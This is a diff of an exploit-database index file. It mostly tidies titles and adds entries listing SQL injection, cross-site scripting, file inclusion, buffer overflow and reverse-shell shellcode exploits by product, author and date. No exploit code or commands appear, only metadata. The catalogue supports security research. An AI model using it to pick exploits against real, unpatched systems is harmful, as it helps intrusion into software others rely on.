-28933,platforms/php/webapps/28933.txt,"AIOCP 1.3.x - cp_codice_fiscale.php choosed_language Parameter SQL Injection",2006-11-06,"laurent gaffie",php,webapps,0 -28934,platforms/php/webapps/28934.txt,"AIOCP 1.3.x - cp_links_search.php orderdir Parameter SQL Injection",2006-11-06,"laurent gaffie",php,webapps,0 -28935,platforms/php/webapps/28935.txt,"AIOCP 1.3.x - cp_dpage.php Full Path Disclosure",2006-11-06,"laurent gaffie",php,webapps,0 -28936,platforms/php/webapps/28936.txt,"AIOCP 1.3.x - cp_show_ec_products.php Full Path Disclosure",2006-11-06,"laurent gaffie",php,webapps,0 -28937,platforms/php/webapps/28937.txt,"AIOCP 1.3.x - cp_show_page_help.php Full Path Disclosure",2006-11-06,"laurent gaffie",php,webapps,0 +28917,platforms/php/webapps/28917.txt,"AIOCP 1.3.x - 'cp_forum_view.php' Multiple Parameter Cross-Site Scripting",2006-11-06,"laurent gaffie",php,webapps,0 +40334,platforms/win_x86/shellcode/40334.c,"Windows x86 - Persistent Reverse Shell TCP (494 Bytes)",2016-09-05,"Roziul Hasan Khan Shifat",win_x86,shellcode,0 +28918,platforms/php/webapps/28918.txt,"AIOCP 1.3.x - 'cp_dpage.php' choosed_language Parameter Cross-Site Scripting",2006-11-06,"laurent gaffie",php,webapps,0 +28919,platforms/php/webapps/28919.txt,"AIOCP 1.3.x - 'cp_show_ec_products.php' order_field Parameter Cross-Site Scripting",2006-11-06,"laurent gaffie",php,webapps,0 +28920,platforms/php/webapps/28920.txt,"AIOCP 1.3.x - 'cp_users_online.php order_field Parameter Cross-Site Scripting",2006-11-06,"laurent gaffie",php,webapps,0 +28921,platforms/php/webapps/28921.txt,"AIOCP 1.3.x - 'cp_links_search.php' orderdir Parameter Cross-Site Scripting",2006-11-06,"laurent gaffie",php,webapps,0 +28922,platforms/php/webapps/28922.txt,"AIOCP 1.3.x - '/admin/code/index.php' load_page Parameter Remote File Inclusion",2006-11-06,"laurent gaffie",php,webapps,0 +28923,platforms/php/webapps/28923.txt,"AIOCP 1.3.x - 'cp_dpage.php' choosed_language Parameter SQL Injection",2006-11-06,"laurent gaffie",php,webapps,0 +28924,platforms/php/webapps/28924.txt,"AIOCP 1.3.x - 'cp_news.php' Multiple Parameter SQL Injection",2006-11-06,"laurent gaffie",php,webapps,0 +28925,platforms/php/webapps/28925.txt,"AIOCP 1.3.x - 'cp_forum_view.php' choosed_language Parameter SQL Injection",2006-11-06,"laurent gaffie",php,webapps,0 +28926,platforms/php/webapps/28926.txt,"AIOCP 1.3.x - 'cp_edit_user.php' choosed_language Parameter SQL Injection",2006-11-06,"laurent gaffie",php,webapps,0 +28927,platforms/php/webapps/28927.txt,"AIOCP 1.3.x - 'cp_newsletter.php' Multiple Parameter SQL Injection",2006-11-06,"laurent gaffie",php,webapps,0 +28928,platforms/php/webapps/28928.txt,"AIOCP 1.3.x - 'cp_links.php' Multiple Parameter SQL Injection",2006-11-06,"laurent gaffie",php,webapps,0 +28929,platforms/php/webapps/28929.txt,"AIOCP 1.3.x - 'cp_contact_us.php' choosed_language Parameter SQL Injection",2006-11-06,"laurent gaffie",php,webapps,0 +28930,platforms/php/webapps/28930.txt,"AIOCP 1.3.x - 'cp_show_ec_products.php' Multiple Parameter SQL Injection",2006-11-06,"laurent gaffie",php,webapps,0 +28931,platforms/php/webapps/28931.txt,"AIOCP 1.3.x - 'cp_login.php' choosed_language Parameter SQL Injection",2006-11-06,"laurent gaffie",php,webapps,0 +28932,platforms/php/webapps/28932.txt,"AIOCP 1.3.x - 'cp_users_online.php' order_field Parameter SQL Injection",2006-11-06,"laurent gaffie",php,webapps,0 +28933,platforms/php/webapps/28933.txt,"AIOCP 1.3.x - 'cp_codice_fiscale.php' choosed_language Parameter SQL Injection",2006-11-06,"laurent gaffie",php,webapps,0 +28934,platforms/php/webapps/28934.txt,"AIOCP 1.3.x - 'cp_links_search.php' orderdir Parameter SQL Injection",2006-11-06,"laurent gaffie",php,webapps,0 +28935,platforms/php/webapps/28935.txt,"AIOCP 1.3.x - 'cp_dpage.php' Full Path Disclosure",2006-11-06,"laurent gaffie",php,webapps,0 +28936,platforms/php/webapps/28936.txt,"AIOCP 1.3.x - 'cp_show_ec_products.php' Full Path Disclosure",2006-11-06,"laurent gaffie",php,webapps,0 +28937,platforms/php/webapps/28937.txt,"AIOCP 1.3.x - 'cp_show_page_help.php' Full Path Disclosure",2006-11-06,"laurent gaffie",php,webapps,0 28938,platforms/php/webapps/28938.txt,"IPManager 2.3 - 'index.php' Cross-Site Scripting",2006-11-07,spaceballyopsolo,php,webapps,0 28939,platforms/php/webapps/28939.txt,"Kayako SupportSuite 3.0.32 - 'index.php' Cross-Site Scripting",2006-11-07,Dr.HAiL,php,webapps,0 28940,platforms/php/webapps/28940.txt,"PHPMyChat 0.14/0.15 - Languages.Lib.php Local File Inclusion",2006-11-08,ajann,php,webapps,0 @@ -26022,7 +26025,7 @@ id,file,description,date,author,platform,type,port 28988,platforms/php/webapps/28988.txt,"Roundcube Webmail 0.1 - 'index.php' Cross-Site Scripting",2006-11-13,RSnake,php,webapps,0 28989,platforms/asp/webapps/28989.txt,"INFINICART - search.asp search Parameter Cross-Site Scripting",2006-11-13,"laurent gaffie",asp,webapps,0 28990,platforms/asp/webapps/28990.txt,"INFINICART - sendpassword.asp email Parameter Cross-Site Scripting",2006-11-13,"laurent gaffie",asp,webapps,0 -28991,platforms/asp/webapps/28991.txt,"INFINICART - login.asp Multiple Parameter Cross-Site Scripting",2006-11-13,"laurent gaffie",asp,webapps,0 +28991,platforms/asp/webapps/28991.txt,"INFINICART - 'login.asp' Multiple Parameter Cross-Site Scripting",2006-11-13,"laurent gaffie",asp,webapps,0 28992,platforms/asp/webapps/28992.txt,"INFINICART - browse_group.asp groupid Parameter SQL Injection",2006-11-13,"laurent gaffie",asp,webapps,0 28993,platforms/asp/webapps/28993.txt,"INFINICART - added_to_cart.asp productid Parameter SQL Injection",2006-11-13,"laurent gaffie",asp,webapps,0 28994,platforms/asp/webapps/28994.txt,"INFINICART - browsesubcat.asp Multiple Parameter SQL Injection",2006-11-13,"laurent gaffie",asp,webapps,0 @@ -26199,14 +26202,14 @@ id,file,description,date,author,platform,type,port 29170,platforms/windows/dos/29170.c,"Nvidia NView 3.5 - Keystone.exe Local Denial of Service",2006-11-23,Hessam-x,windows,dos,0 29171,platforms/windows/remote/29171.txt,"Business Objects Crystal Reports XI Professional - File Handling Buffer Overflow",2006-11-23,LSsec.com,windows,remote,0 29172,platforms/windows/dos/29172.txt,"Microsoft Office 97 - HTMLMARQ.OCX Library Denial of Service",2006-11-22,"Michal Bucko",windows,dos,0 -29173,platforms/php/webapps/29173.txt,"Active PHP Bookmarks 1.1.2 - APB_SETTINGS['apb_path'] Multiple Remote File Inclusion",2006-11-23,ThE-LoRd-Of-CrAcKiNg,php,webapps,0 +29173,platforms/php/webapps/29173.txt,"Active PHP Bookmarks 1.1.2 - APB_SETTINGS['apb_path' ] Multiple Remote File Inclusion",2006-11-23,ThE-LoRd-Of-CrAcKiNg,php,webapps,0 29174,platforms/asp/webapps/29174.txt,"MidiCart ASP - Item_Show.asp ID2006quant Parameter SQL Injection",2006-11-24,"Aria-Security Team",asp,webapps,0 29175,platforms/php/webapps/29175.txt,"Simple PHP Gallery 1.1 - System SP_Index.php Cross-Site Scripting",2006-11-24,"Al7ejaz Hacker",php,webapps,0 29176,platforms/asp/webapps/29176.txt,"ASP ListPics 5.0 - Listpics.asp SQL Injection",2006-11-24,"Aria-Security Team",asp,webapps,0 29177,platforms/php/webapps/29177.txt,"MMGallery 1.55 - Thumbs.php Cross-Site Scripting",2006-11-24,"Al7ejaz Hacker",php,webapps,0 29178,platforms/asp/webapps/29178.txt,"Fixit iDms Pro Image Gallery - filelist.asp Multiple Parameter SQL Injection",2006-11-24,"Aria-Security Team",asp,webapps,0 29179,platforms/asp/webapps/29179.txt,"Fixit iDms Pro Image Gallery - showfile.asp fid Parameter SQL Injection",2006-11-24,"Aria-Security Team",asp,webapps,0 -29180,platforms/asp/webapps/29180.txt,"SIAP CMS - login.asp SQL Injection",2006-11-25,nagazakig74,asp,webapps,0 +29180,platforms/asp/webapps/29180.txt,"SIAP CMS - 'login.asp' SQL Injection",2006-11-25,nagazakig74,asp,webapps,0 29181,platforms/php/webapps/29181.txt,"CPanel 11 Beta - Multiple Cross-Site Scripting Vulnerabilities",2006-11-25,"Aria-Security Team",php,webapps,0 29182,platforms/php/webapps/29182.txt,"cPanel WebHost Manager 3.1 - dochangeemail email Parameter Cross-Site Scripting",2006-11-25,"Aria-Security Team",php,webapps,0 29183,platforms/php/webapps/29183.txt,"cPanel WebHost Manager 3.1 - addon_configsupport.cgi supporturl Parameter Cross-Site Scripting",2006-11-25,"Aria-Security Team",php,webapps,0 @@ -26279,7 +26282,7 @@ id,file,description,date,author,platform,type,port 29268,platforms/php/webapps/29268.txt,"ProNews 1.5 - lire-avis.php aa Parameter SQL Injection",2006-12-09,Mr_KaLiMaN,php,webapps,0 29269,platforms/php/webapps/29269.txt,"ProNews 1.5 - lire-avis.php aa Parameter Cross-Site Scripting",2006-12-09,Mr_KaLiMaN,php,webapps,0 29270,platforms/php/webapps/29270.txt,"MXBB Profile Control Panel 0.91c - Module Remote File Inclusion",2006-12-09,bd0rk,php,webapps,0 -29271,platforms/asp/webapps/29271.txt,"AppIntellect SpotLight CRM - login.asp SQL Injection",2006-12-09,ajann,asp,webapps,0 +29271,platforms/asp/webapps/29271.txt,"AppIntellect SpotLight CRM - 'login.asp' SQL Injection",2006-12-09,ajann,asp,webapps,0 29272,platforms/php/webapps/29272.txt,"CMS Made Simple 1.0.2 - SearchInput Cross-Site Scripting",2006-12-11,Nicokiller,php,webapps,0 29280,platforms/php/webapps/29280.txt,"GTX CMS 2013 Optima - SQL Injection",2013-10-29,Vulnerability-Lab,php,webapps,0 29281,platforms/windows/remote/29281.txt,"Hilgraeve HyperAccess 8.4 - Multiple Remote Command Execution Vulnerabilities",2006-12-14,"Brett Moore",windows,remote,0 @@ -26361,7 +26364,7 @@ id,file,description,date,author,platform,type,port 29474,platforms/php/webapps/29474.txt,"Scriptme SmE 1.21 - File Mailer Login SQL Injection",2007-01-16,CorryL,php,webapps,0 29356,platforms/php/webapps/29356.txt,"Wordpress 1.x/2.0.x - template.php HTML Injection",2006-12-27,"David Kierznowski",php,webapps,0 29357,platforms/asp/webapps/29357.txt,"Hosting Controller 7C - FolderManager.aspx Directory Traversal",2006-12-27,KAPDA,asp,webapps,0 -29358,platforms/asp/webapps/29358.txt,"DMXReady Secure Login Manager 1.0 - login.asp sent Parameter SQL Injection",2006-12-27,Doz,asp,webapps,0 +29358,platforms/asp/webapps/29358.txt,"DMXReady Secure Login Manager 1.0 - 'login.asp' sent Parameter SQL Injection",2006-12-27,Doz,asp,webapps,0 29359,platforms/asp/webapps/29359.txt,"DMXReady Secure Login Manager 1.0 - content.asp sent Parameter SQL Injection",2006-12-27,Doz,asp,webapps,0 29360,platforms/asp/webapps/29360.txt,"DMXReady Secure Login Manager 1.0 - members.asp sent Parameter SQL Injection",2006-12-27,Doz,asp,webapps,0 29361,platforms/asp/webapps/29361.txt,"DMXReady Secure Login Manager 1.0 - applications/SecureLoginManager/inc_secureloginmanager.asp sent Parameter SQL Injection",2006-12-27,Doz,asp,webapps,0 @@ -26442,7 +26445,7 @@ id,file,description,date,author,platform,type,port 29438,platforms/php/webapps/29438.txt,"Edit-X - Edit_Address.php Remote File Inclusion",2007-01-09,IbnuSina,php,webapps,0 29439,platforms/multiple/remote/29439.txt,"iPlanet Web Server 4.1 - Search Module Cross-Site Scripting",2007-01-09,Khalsa,multiple,remote,0 29441,platforms/osx/dos/29441.txt,"Apple Mac OSX 10.4.8 - DMG UFS FFS_MountFS Integer Overflow",2007-01-10,LMH,osx,dos,0 -29442,platforms/php/webapps/29442.html,"PHPBB 2.0.21 - privmsg.php HTML Injection",2007-01-11,Demential,php,webapps,0 +29442,platforms/php/webapps/29442.html,"phpBB 2.0.21 - privmsg.php HTML Injection",2007-01-11,Demential,php,webapps,0 29443,platforms/windows/dos/29443.py,"VideoLAN VLC Media Player 0.8.6a - Unspecified Denial of Service",2007-01-11,shinnai,windows,dos,0 29444,platforms/windows/dos/29444.pl,"CA BrightStor ARCserve Backup - Message Engine/Tape Engine Remote Buffer Overflow",2007-01-11,"Tenable NS",windows,dos,0 29445,platforms/windows/dos/29445.rb,"Hanso Player 2.5.0 - 'm3u' Buffer Overflow (Denial of Service)",2013-11-05,"Necmettin COSKUN",windows,dos,0 @@ -26484,10 +26487,10 @@ id,file,description,date,author,platform,type,port 29486,platforms/php/webapps/29486.txt,"Indexu 5.0/5.3 - power_search.php Multiple Parameter Cross-Site Scripting",2007-01-16,SwEET-DeViL,php,webapps,0 29487,platforms/php/webapps/29487.txt,"Indexu 5.0/5.3 - new.php Multiple Parameter Cross-Site Scripting",2007-01-16,SwEET-DeViL,php,webapps,0 29488,platforms/php/webapps/29488.txt,"Indexu 5.0/5.3 - mailing_list.php Multiple Variables Cross-Site Scripting",2007-01-16,SwEET-DeViL,php,webapps,0 -29489,platforms/php/webapps/29489.txt,"Indexu 5.0/5.3 - login.php error_msg Parameter Cross-Site Scripting",2007-01-16,SwEET-DeViL,php,webapps,0 +29489,platforms/php/webapps/29489.txt,"Indexu 5.0/5.3 - 'login.php' error_msg Parameter Cross-Site Scripting",2007-01-16,SwEET-DeViL,php,webapps,0 29490,platforms/windows/remote/29490.txt,"avm fritz!dsl igd control service 2.2.29 - Directory Traversal information disclosure",2007-01-17,DPR,windows,remote,0 29491,platforms/php/webapps/29491.txt,"myBloggie 2.1.5 - 'index.php' PATH_INFO Parameter Cross-Site Scripting",2007-01-17,CorryL,php,webapps,0 -29492,platforms/php/webapps/29492.txt,"myBloggie 2.1.5 - login.php PATH_INFO Parameter Cross-Site Scripting",2007-01-17,CorryL,php,webapps,0 +29492,platforms/php/webapps/29492.txt,"myBloggie 2.1.5 - 'login.php' PATH_INFO Parameter Cross-Site Scripting",2007-01-17,CorryL,php,webapps,0 29495,platforms/php/webapps/29495.txt,"Sabros.US 1.7 - 'index.php' Cross-Site Scripting",2007-01-18,CorryL,php,webapps,0 29496,platforms/linux/remote/29496.txt,"ArsDigita Community System 3.4.x - Directory Traversal",2007-01-18,"Elliot Kendall",linux,remote,0 29497,platforms/php/webapps/29497.txt,"Easebay Resources Paypal Subscription - Manager Multiple Input Validation Vulnerabilities",2007-01-20,Doz,php,webapps,0 @@ -26696,9 +26699,9 @@ id,file,description,date,author,platform,type,port 29651,platforms/php/webapps/29651.txt,"Active Calendar 1.2 - data/y_2.php css Parameter Cross-Site Scripting",2007-02-24,"Simon Bonnard",php,webapps,0 29652,platforms/php/webapps/29652.txt,"Active Calendar 1.2 - data/y_3.php css Parameter Cross-Site Scripting",2007-02-24,"Simon Bonnard",php,webapps,0 29653,platforms/php/webapps/29653.txt,"Active Calendar 1.2 - data/mysqlevents.php css Parameter Cross-Site Scripting",2007-02-24,"Simon Bonnard",php,webapps,0 -29671,platforms/windows/dos/29671.txt,"Avira Secure Backup 1.0.0.1 Build 3616 - '.reg'Buffer Overflow",2013-11-18,"Julien Ahrens",windows,dos,0 +29671,platforms/windows/dos/29671.txt,"Avira Secure Backup 1.0.0.1 Build 3616 - '.reg' Buffer Overflow",2013-11-18,"Julien Ahrens",windows,dos,0 29790,platforms/php/webapps/29790.txt,"ImpressPages CMS 3.8 - Persistent Cross-Site Scripting",2013-11-23,sajith,php,webapps,0 -29791,platforms/windows/dos/29791.pl,"Boilsoft RM TO MP3 Converter 1.72 - Crash PoC '.wav'",2013-11-23,"Akin Tosunlar",windows,dos,0 +29791,platforms/windows/dos/29791.pl,"Boilsoft RM TO MP3 Converter 1.72 - '.wav' Crash PoC",2013-11-23,"Akin Tosunlar",windows,dos,0 29658,platforms/php/webapps/29658.txt,"PhotoStand 1.2 - 'index.php' Cross-Site Scripting",2007-02-24,"Simon Bonnard",php,webapps,0 29659,platforms/windows/dos/29659.pl,"Microsoft Windows XP/2003 - Explorer .WMF File Handling Denial of Service",2007-02-25,sehato,windows,dos,0 29660,platforms/windows/dos/29660.txt,"Microsoft Office 2003 - Denial of Service (Denial of Service)",2007-02-25,sehato,windows,dos,0 @@ -26740,7 +26743,7 @@ id,file,description,date,author,platform,type,port 29701,platforms/php/webapps/29701.txt,"Wordpress 2.1.1 - Arbitrary Command Execution",2007-03-02,"Ivan Fratric",php,webapps,0 29702,platforms/php/webapps/29702.txt,"Wordpress 2.1.1 - wp-includes/theme.php iz Variable Arbitrary Command Execution",2007-03-02,"Ivan Fratric",php,webapps,0 29703,platforms/php/webapps/29703.txt,"Tyger Bug Tracking System 1.1.3 - 'ViewBugs.php' 's' Variable SQL Injection",2007-02-26,CorryL,php,webapps,0 -29704,platforms/php/webapps/29704.txt,"Tyger Bug Tracking System 1.1.3 - login.php PATH_INFO Parameter Cross-Site Scripting",2007-02-26,CorryL,php,webapps,0 +29704,platforms/php/webapps/29704.txt,"Tyger Bug Tracking System 1.1.3 - 'login.php' PATH_INFO Parameter Cross-Site Scripting",2007-02-26,CorryL,php,webapps,0 29705,platforms/php/webapps/29705.txt,"Tyger Bug Tracking System 1.1.3 - register.php PATH_INFO Parameter Cross-Site Scripting",2007-02-26,CorryL,php,webapps,0 29706,platforms/linux/remote/29706.txt,"DeepOfix SMTP Server 3.3 - Authentication Bypass",2013-11-19,"Gerardo Vazquez, Eduardo Arriols",linux,remote,0 29707,platforms/windows/dos/29707.txt,"JPEGView 1.0.29 - Crash (PoC)",2013-11-19,"Debasish Mandal",windows,dos,0 @@ -26781,13 +26784,13 @@ id,file,description,date,author,platform,type,port 29742,platforms/php/webapps/29742.txt,"Horde IMP Webmail 4.0.4 Client - Multiple Input Validation Vulnerabilities",2007-03-15,"Immerda Project Group",php,webapps,0 29743,platforms/windows/dos/29743.txt,"Symantec SYMTDI.SYS Device Driver - Local Denial of Service (Denial of Service)",2007-03-15,"David Matousek",windows,dos,0 29744,platforms/php/webapps/29744.txt,"Viper Web Portal 0.1 - 'index.php' Remote File Inclusion",2007-03-15,"Abdus Samad",php,webapps,0 -29745,platforms/php/webapps/29745.txt,"Horde Framework 3.1.3 - login.php Cross-Site Scripting",2007-03-15,"Moritz Naumann",php,webapps,0 +29745,platforms/php/webapps/29745.txt,"Horde Framework 3.1.3 - 'login.php' Cross-Site Scripting",2007-03-15,"Moritz Naumann",php,webapps,0 29746,platforms/linux/local/29746.txt,"Horde Framework and IMP 2.x/3.x - Cleanup Cron Script Arbitrary File Deletion",2007-03-15,anonymous,linux,local,0 29747,platforms/php/webapps/29747.txt,"DirectAdmin 1.292 - CMD_USER_STATS Cross-Site Scripting",2007-03-16,Mandr4ke,php,webapps,0 29748,platforms/php/webapps/29748.txt,"Holtstraeter Rot 13 - Enkrypt.php Directory Traversal",2007-03-16,"BorN To K!LL",php,webapps,0 29749,platforms/multiple/remote/29749.txt,"Oracle Portal 10g - P_OldURL Parameter Cross-Site Scripting",2007-03-16,d3nx,multiple,remote,0 -29750,platforms/php/webapps/29750.php,"PHPStats 0.1.9 - Multiple SQL Injections",2007-03-16,rgod,php,webapps,0 -29751,platforms/php/webapps/29751.php,"PHPStats 0.1.9 - PHP-Stats-options.php Remote Code Execution",2007-03-17,rgod,php,webapps,0 +29750,platforms/php/webapps/29750.php,"phpStats 0.1.9 - Multiple SQL Injections",2007-03-16,rgod,php,webapps,0 +29751,platforms/php/webapps/29751.php,"phpStats 0.1.9 - PHP-Stats-options.php Remote Code Execution",2007-03-17,rgod,php,webapps,0 29752,platforms/php/remote/29752.php,"PHP 5.1.6 - Mb_Parse_Str Function Register_Globals Activation",2007-03-19,"Stefan Esser",php,remote,0 29753,platforms/linux/remote/29753.c,"File(1) 4.13 - Command File_PrintF Integer Underflow",2007-03-19,"Jean-Sebastien Guay-Leroux",linux,remote,0 29754,platforms/php/webapps/29754.html,"Wordpress 2.x - PHP_Self Cross-Site Scripting",2007-03-19,"Alexander Concha",php,webapps,0 @@ -26809,7 +26812,7 @@ id,file,description,date,author,platform,type,port 29770,platforms/linux/remote/29770.txt,"KDE Konqueror 3.x/IOSlave - FTP PASV Port-Scanning",2007-03-21,mark,linux,remote,0 29771,platforms/windows/remote/29771.txt,"Microsoft Windows Vista - Windows Mail Local File Execution",2007-03-23,kingcope,windows,remote,0 29772,platforms/php/webapps/29772.txt,"Free File Hosting System 1.1 - contact.php AD_BODY_TEMP Parameter Remote File Inclusion",2007-03-24,IbnuSina,php,webapps,0 -29773,platforms/php/webapps/29773.txt,"Free File Hosting System 1.1 - login.php AD_BODY_TEMP Parameter Remote File Inclusion",2007-03-24,IbnuSina,php,webapps,0 +29773,platforms/php/webapps/29773.txt,"Free File Hosting System 1.1 - 'login.php' AD_BODY_TEMP Parameter Remote File Inclusion",2007-03-24,IbnuSina,php,webapps,0 29774,platforms/php/webapps/29774.txt,"Free File Hosting System 1.1 - register.php AD_BODY_TEMP Parameter Remote File Inclusion",2007-03-24,IbnuSina,php,webapps,0 29775,platforms/php/webapps/29775.txt,"Image_Upload Script 2.0 - Multiple Remote File Inclusion",2007-03-26,Crackers_Child,php,webapps,0 29776,platforms/php/webapps/29776.txt,"CcCounter 2.0 - 'index.php' Cross-Site Scripting",2007-03-26,Crackers_Child,php,webapps,0 @@ -26923,7 +26926,7 @@ id,file,description,date,author,platform,type,port 29825,platforms/php/webapps/29825.txt,"UBB.Threads 6.1.1 - UBBThreads.php SQL Injection",2007-04-09,"John Martinelli",php,webapps,0 29826,platforms/linux/dos/29826.txt,"Linux Kernel 2.6.x - AppleTalk ATalk_Sum_SKB Function Denial of Service",2007-04-09,"Jean Delvare",linux,dos,0 29827,platforms/php/webapps/29827.pl,"eCardMAX HotEditor 4.0 - Keyboard.php Local File Inclusion",2007-04-09,Liz0ziM,php,webapps,0 -29828,platforms/php/webapps/29828.html,"DeskPro 2.0.1 - login.php HTML Injection",2007-04-09,"John Martinelli",php,webapps,0 +29828,platforms/php/webapps/29828.html,"DeskPro 2.0.1 - 'login.php' HTML Injection",2007-04-09,"John Martinelli",php,webapps,0 29829,platforms/php/webapps/29829.txt,"Einfacher Passworschutz - 'index.php' Cross-Site Scripting",2007-04-10,hackberry,php,webapps,0 29830,platforms/php/webapps/29830.txt,"MyNews 4.2.2 - Week_Events.php Remote File Inclusion",2007-04-10,hackberry,php,webapps,0 29831,platforms/php/webapps/29831.txt,"DropAFew 0.2 - newaccount2.php Arbitrary Account Creation",2007-04-10,"Alexander Klink",php,webapps,0 @@ -26991,12 +26994,12 @@ id,file,description,date,author,platform,type,port 29895,platforms/php/webapps/29895.txt,"phpMyAdmin 2.9.1 - Multiple Cross-Site Scripting Vulnerabilities",2007-04-24,sp3x@securityreason.com,php,webapps,0 29896,platforms/windows/dos/29896.c,"Cdelia Software ImageProcessing - Malformed BMP File Denial of Service",2007-04-24,Dr.Ninux,windows,dos,0 29897,platforms/windows/remote/29897.txt,"Progress 3.1 - Webspeed _CPYFile.P Unauthorized Access",2007-04-24,suresync,windows,remote,0 -29898,platforms/php/webapps/29898.txt,"plesk 8.1.1 - login.php3 Directory Traversal",2007-04-25,anonymous,php,webapps,0 +29898,platforms/php/webapps/29898.txt,"plesk 8.1.1 - 'login.php3' Directory Traversal",2007-04-25,anonymous,php,webapps,0 29899,platforms/php/webapps/29899.txt,"MyNewsGroups 0.6 - Include.php Remote File Inclusion",2007-04-25,"Ali and Saeid",php,webapps,0 29900,platforms/multiple/dos/29900.txt,"Asterisk 1.4 SIP T.38 SDP - Parsing Remote Stack Buffer Overflow (1)",2007-03-21,"Barrie Dempster",multiple,dos,0 29901,platforms/multiple/dos/29901.txt,"Asterisk 1.4 SIP T.38 SDP - Parsing Remote Stack Buffer Overflow (2)",2007-03-21,"Barrie Dempster",multiple,dos,0 29902,platforms/php/webapps/29902.txt,"PHPMyTGP 1.4 - AddVIP.php Remote File Inclusion",2007-04-25,alijsb,php,webapps,0 -29903,platforms/php/webapps/29903.txt,"Ahhp Portal - page.php Multiple Remote File Inclusion",2007-04-25,CodeXpLoder'tq,php,webapps,0 +29903,platforms/php/webapps/29903.txt,"Ahhp Portal - 'page.php' Multiple Remote File Inclusion",2007-04-25,CodeXpLoder'tq,php,webapps,0 29904,platforms/php/webapps/29904.txt,"CafeLog B2 0.6.1 - Weblog and News Publishing Tool b2archives.php b2inc Parameter Remote File Inclusion",2006-04-25,alijsb,php,webapps,0 29905,platforms/php/webapps/29905.txt,"CafeLog B2 0.6.1 Weblog and News Publishing Tool - b2categories.php b2inc Parameter Remote File Inclusion",2006-04-25,alijsb,php,webapps,0 29906,platforms/php/webapps/29906.txt,"CafeLog B2 0.6.1 Weblog and News Publishing Tool - b2mail.php b2inc Parameter Remote File Inclusion",2006-04-25,alijsb,php,webapps,0 @@ -27090,8 +27093,8 @@ id,file,description,date,author,platform,type,port 30002,platforms/php/webapps/30002.txt,"Wordpress Formcraft Plugin - SQL Injection",2013-12-02,"Ashiyane Digital Security Team",php,webapps,0 30003,platforms/php/webapps/30003.txt,"Campsite 2.6.1 - implementation/management/configuration.php g_documentRoot Parameter Remote File Inclusion",2007-05-08,anonymous,php,webapps,0 30004,platforms/php/webapps/30004.txt,"Campsite 2.6.1 - implementation/management/db_connect.php g_documentRoot Parameter Remote File Inclusion",2007-05-08,anonymous,php,webapps,0 -30005,platforms/php/webapps/30005.txt,"Campsite 2.6.1 - 'LocalizerConfig.php' g_documentRoot Parameter Remote File Inclusion",2007-05-08,anonymous,php,webapps,0 -30006,platforms/php/webapps/30006.txt,"Campsite 2.6.1 - 'LocalizerLanguage.php' g_documentRoot Parameter Remote File Inclusion",2007-05-08,anonymous,php,webapps,0 +30005,platforms/php/webapps/30005.txt,"Campsite 2.6.1 - ' LocalizerConfig.php' g_documentRoot Parameter Remote File Inclusion",2007-05-08,anonymous,php,webapps,0 +30006,platforms/php/webapps/30006.txt,"Campsite 2.6.1 - ' LocalizerLanguage.php' g_documentRoot Parameter Remote File Inclusion",2007-05-08,anonymous,php,webapps,0 30007,platforms/windows/local/30007.txt,"Notepad++ Plugin Notepad 1.5 - Local Exploit",2013-12-03,"Junwen Sun",windows,local,0 30008,platforms/java/remote/30008.rb,"Cisco Prime Data Center Network Manager - Arbitrary File Upload",2013-12-03,Metasploit,java,remote,0 30009,platforms/windows/remote/30009.rb,"ABB MicroSCADA - wserver.exe Remote Code Execution",2013-12-03,Metasploit,windows,remote,12221 @@ -27112,7 +27115,7 @@ id,file,description,date,author,platform,type,port 30072,platforms/php/webapps/30072.txt,"PsychoStats 3.0.6b - Multiple Scripts Multiple Cross-Site Scripting Vulnerabilities",2007-05-22,"John Martinelli",php,webapps,0 30073,platforms/php/webapps/30073.txt,"GMTT Music Distro 1.2 - ShowOwn.php Cross-Site Scripting",2007-05-22,CorryL,php,webapps,0 30074,platforms/linux/remote/30074.txt,"PHP PEAR 1.5.3 - INSTALL-AS Attribute Arbitrary File Overwrite",2007-05-07,"Gregory Beaver",linux,remote,0 -30075,platforms/php/webapps/30075.txt,"PHPPgAdmin 4.1.1 - SQLEDIT.php Cross-Site Scripting",2007-05-23,"Michal Majchrowicz",php,webapps,0 +30075,platforms/php/webapps/30075.txt,"phpPgAdmin 4.1.1 - SQLEDIT.php Cross-Site Scripting",2007-05-23,"Michal Majchrowicz",php,webapps,0 30076,platforms/php/webapps/30076.txt,"WYYS 1.0 - 'index.php' Cross-Site Scripting",2007-05-23,vagrant,php,webapps,0 30077,platforms/asp/webapps/30077.txt,"Cisco CallManager 4.1 - Search Form Cross-Site Scripting",2007-05-23,"Marc Ruef",asp,webapps,0 30078,platforms/multiple/remote/30078.js,"Apple Safari 2.0.4 - Cross-Domain Browser Location Information Disclosure",2007-05-23,"Gareth Heyes",multiple,remote,0 @@ -27199,7 +27202,7 @@ id,file,description,date,author,platform,type,port 30273,platforms/java/webapps/30273.txt,"OpManager 6/7 - reports/ReportViewAction.do Multiple Parameter Cross-Site Scripting",2007-07-04,Lostmon,java,webapps,0 30274,platforms/java/webapps/30274.txt,"OpManager 6/7 - admin/ServiceConfiguration.do operation Parameter Cross-Site Scripting",2007-07-04,Lostmon,java,webapps,0 30275,platforms/java/webapps/30275.txt,"OpManager 6/7 - admin/DeviceAssociation.do Multiple Parameter Cross-Site Scripting",2007-07-04,Lostmon,java,webapps,0 -30277,platforms/php/webapps/30277.txt,"Maia Mailguard 1.0.2 - login.php Multiple Local File Inclusion",2007-07-05,"Adriel T. Desautels",php,webapps,0 +30277,platforms/php/webapps/30277.txt,"Maia Mailguard 1.0.2 - 'login.php' Multiple Local File Inclusion",2007-07-05,"Adriel T. Desautels",php,webapps,0 30278,platforms/windows/remote/30278.c,"SAP DB 7.x - Web Server WAHTTP.exe Multiple Buffer Overflow Vulnerabilities",2007-07-05,"Mark Litchfield",windows,remote,0 30279,platforms/multiple/remote/30279.txt,"SAP Internet Graphics Server 7.0 - Parameters Cross-Site Scripting",2007-07-05,"Mark Litchfield",multiple,remote,0 30280,platforms/linux/local/30280.txt,"GFax 0.7.6 - Temporary Files Local Arbitrary Command Execution",2007-07-05,"Steve Kemp",linux,local,0 @@ -27292,7 +27295,7 @@ id,file,description,date,author,platform,type,port 30399,platforms/aix/local/30399.c,"IBM AIX 5.2/5.3 - Capture Command Local Stack Based Buffer Overflow",2007-07-26,qaaz,aix,local,0 30400,platforms/aix/local/30400.c,"IBM AIX 5.2/5.3 FTP Client - Local Buffer Overflow",2007-07-26,qaaz,aix,local,0 30401,platforms/php/dos/30401.php,"T1lib - intT1_Env_GetCompletePath Buffer Overflow",2007-07-26,r0ut3r,php,dos,0 